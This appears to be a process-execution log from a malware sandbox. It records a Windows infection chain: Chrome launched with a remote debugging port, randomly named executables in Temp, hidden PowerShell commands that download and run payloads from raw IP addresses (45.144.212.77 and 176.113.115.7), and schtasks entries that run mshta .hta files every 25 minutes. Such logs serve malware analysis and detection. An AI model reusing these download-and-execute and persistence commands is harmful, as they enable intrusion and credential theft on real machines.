C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1588 --field-trial-handle=1360,i,18057566052343278885,9921208162401892307,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2104 --field-trial-handle=1360,i,18057566052343278885,9921208162401892307,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2336 --field-trial-handle=1360,i,18057566052343278885,9921208162401892307,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2344 --field-trial-handle=1360,i,18057566052343278885,9921208162401892307,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1404 --field-trial-handle=1360,i,18057566052343278885,9921208162401892307,131072 /prefetch:2
C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe
"C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef68b9758,0x7fef68b9768,0x7fef68b9778
C:\Windows\system32\ctfmon.exe
ctfmon.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1092 --field-trial-handle=1344,i,15498433673152258161,11895859552423182892,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1524 --field-trial-handle=1344,i,15498433673152258161,11895859552423182892,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1608 --field-trial-handle=1344,i,15498433673152258161,11895859552423182892,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2024 --field-trial-handle=1344,i,15498433673152258161,11895859552423182892,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2504 --field-trial-handle=1344,i,15498433673152258161,11895859552423182892,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2512 --field-trial-handle=1344,i,15498433673152258161,11895859552423182892,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=3544 --field-trial-handle=1344,i,15498433673152258161,11895859552423182892,131072 /prefetch:2
C:\Users\Admin\AppData\Local\Temp\10110190101\zY9sqWs.exe
"C:\Users\Admin\AppData\Local\Temp\10110190101\zY9sqWs.exe"
C:\Users\Admin\AppData\Local\Temp\10110200101\PcAIvJ0.exe
"C:\Users\Admin\AppData\Local\Temp\10110200101\PcAIvJ0.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7D99.tmp\7D9A.tmp\7D9B.bat C:\Users\Admin\AppData\Local\Temp\10110200101\PcAIvJ0.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"
C:\Users\Admin\AppData\Local\Temp\10110210101\v6Oqdnc.exe
"C:\Users\Admin\AppData\Local\Temp\10110210101\v6Oqdnc.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1932 -s 1204
C:\Users\Admin\AppData\Local\Temp\10110220101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10110220101\MCxU5Fj.exe"
C:\Users\Admin\AppData\Local\Temp\10110220101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10110220101\MCxU5Fj.exe"
C:\Users\Admin\AppData\Local\Temp\10110220101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10110220101\MCxU5Fj.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 668 -s 508
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6159758,0x7fef6159768,0x7fef6159778
C:\Windows\system32\ctfmon.exe
ctfmon.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1148 --field-trial-handle=1248,i,2508522781846531130,13728793299601325557,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1528 --field-trial-handle=1248,i,2508522781846531130,13728793299601325557,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1624 --field-trial-handle=1248,i,2508522781846531130,13728793299601325557,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2212 --field-trial-handle=1248,i,2508522781846531130,13728793299601325557,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2740 --field-trial-handle=1248,i,2508522781846531130,13728793299601325557,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2756 --field-trial-handle=1248,i,2508522781846531130,13728793299601325557,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Users\Admin\AppData\Local\Temp\10110240101\mAtJWNv.exe
"C:\Users\Admin\AppData\Local\Temp\10110240101\mAtJWNv.exe"
C:\Users\Admin\AppData\Local\Temp\10110240101\mAtJWNv.exe
"C:\Users\Admin\AppData\Local\Temp\10110240101\mAtJWNv.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1932 -s 496
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2276 -s 1012
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6159758,0x7fef6159768,0x7fef6159778
C:\Windows\system32\ctfmon.exe
ctfmon.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1116 --field-trial-handle=1368,i,3768455966361669316,6836469402976232167,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1480 --field-trial-handle=1368,i,3768455966361669316,6836469402976232167,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1552 --field-trial-handle=1368,i,3768455966361669316,6836469402976232167,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=1892 --field-trial-handle=1368,i,3768455966361669316,6836469402976232167,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2604 --field-trial-handle=1368,i,3768455966361669316,6836469402976232167,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2620 --field-trial-handle=1368,i,3768455966361669316,6836469402976232167,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1384 --field-trial-handle=1368,i,3768455966361669316,6836469402976232167,131072 /prefetch:2
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3856 --field-trial-handle=1368,i,3768455966361669316,6836469402976232167,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6159758,0x7fef6159768,0x7fef6159778
C:\Windows\system32\ctfmon.exe
ctfmon.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1104 --field-trial-handle=1356,i,18071569236591641750,17119348354317633750,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1496 --field-trial-handle=1356,i,18071569236591641750,17119348354317633750,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1588 --field-trial-handle=1356,i,18071569236591641750,17119348354317633750,131072 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\10110250101\FvbuInU.exe
"C:\Users\Admin\AppData\Local\Temp\10110250101\FvbuInU.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2304 --field-trial-handle=1356,i,18071569236591641750,17119348354317633750,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2648 --field-trial-handle=1356,i,18071569236591641750,17119348354317633750,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2660 --field-trial-handle=1356,i,18071569236591641750,17119348354317633750,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1412 --field-trial-handle=1356,i,18071569236591641750,17119348354317633750,131072 /prefetch:2
C:\Users\Admin\AppData\Local\Temp\10110270101\nhDLtPT.exe
"C:\Users\Admin\AppData\Local\Temp\10110270101\nhDLtPT.exe"
C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe
"C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe"
C:\Users\Admin\AppData\Local\Temp\10110390101\65198a42c7.exe
"C:\Users\Admin\AppData\Local\Temp\10110390101\65198a42c7.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn pWjUxmaAAtA /tr "mshta C:\Users\Admin\AppData\Local\Temp\k1LPaL4Kj.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta C:\Users\Admin\AppData\Local\Temp\k1LPaL4Kj.hta
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-978119600343539042250744909-55483057217897636601606920266640871385134754446"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn pWjUxmaAAtA /tr "mshta C:\Users\Admin\AppData\Local\Temp\k1LPaL4Kj.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'2KGUWLTSFOVDS7ZH2HNGQRTCDADMRWVV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "505067796-1153842925-494037547-639544905-20038279561817986896-20837647151848889869"
C:\Windows\system32\taskeng.exe
taskeng.exe {19EEA476-79DB-4278-AD32-55318631A63F} S-1-5-21-677481364-2238709445-1347953534-1000:JXXXDSWS\Admin:Interactive:[1]
C:\ProgramData\dmax\rqrt.exe
C:\ProgramData\dmax\rqrt.exe
C:\Users\Admin\AppData\Local\Temp2KGUWLTSFOVDS7ZH2HNGQRTCDADMRWVV.EXE
"C:\Users\Admin\AppData\Local\Temp2KGUWLTSFOVDS7ZH2HNGQRTCDADMRWVV.EXE"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6879758,0x7fef6879768,0x7fef6879778
C:\Windows\system32\ctfmon.exe
ctfmon.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1104 --field-trial-handle=1140,i,17209538232387302983,15566976510645219374,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1500 --field-trial-handle=1140,i,17209538232387302983,15566976510645219374,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1584 --field-trial-handle=1140,i,17209538232387302983,15566976510645219374,131072 /prefetch:8
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\10110400121\am_no.cmd" "
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2356 --field-trial-handle=1140,i,17209538232387302983,15566976510645219374,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Windows\SysWOW64\timeout.exe
timeout /t 2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2644 --field-trial-handle=1140,i,17209538232387302983,15566976510645219374,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2660 --field-trial-handle=1140,i,17209538232387302983,15566976510645219374,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1304 --field-trial-handle=1140,i,17209538232387302983,15566976510645219374,131072 /prefetch:2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "LW2TumadFO1" /tr "mshta \"C:\Temp\FhzKbqCT0.hta\"" /sc minute /mo 25 /ru "Admin" /f
